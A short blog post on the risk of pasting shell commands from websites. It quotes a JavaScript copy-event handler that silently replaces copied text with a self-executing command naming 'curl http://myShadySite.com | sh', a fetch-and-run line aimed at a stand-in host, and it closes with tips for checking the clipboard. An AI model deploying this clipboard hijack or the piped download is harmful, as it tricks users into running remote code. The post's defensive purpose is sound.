Monthly Archives: October 2020

Copying shell commands from websites

There are quite a few websites – like Homebrew, for instance – that offer initial installation in a form of shell script that downloads installation binary and runs it (or does some other actions like saving specific values to a configuration file). I always had some vague concern about copying and running commands, but then again, you could read those commands and judge for yourself if they’re malicious or not, right? Yes, but…

I stumbled upon an article today that highlighted how the copied code could be not what it seems – or rather, it’d replace copied text with something else: https://briantracy.xyz/writing/copy-paste-shell.html

It’s quite ingenious, really – it hooks onto copy event and it replaces clipboard data with another command, that’d even have a newline at the end so it’d launch after you paste it automatically. Here’s the code from the article:

document.getElementById('copyme').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain', 
        'echo "this could have been [curl http://myShadySite.com | sh]"\n'
    );
    e.preventDefault();
});

Now, you need to land on a frankly malicious website that’d do such a trick to you, but there also might be an XSS on an honest website that could utilise that. One way to safeguard yourself would be check your clipboard content (I use Alfred for OSX, it has an amazing feature of clipboard history), or paste the copied data in text editor or any non-shell text field to validate it’s what you expect it to be.

Live and learn!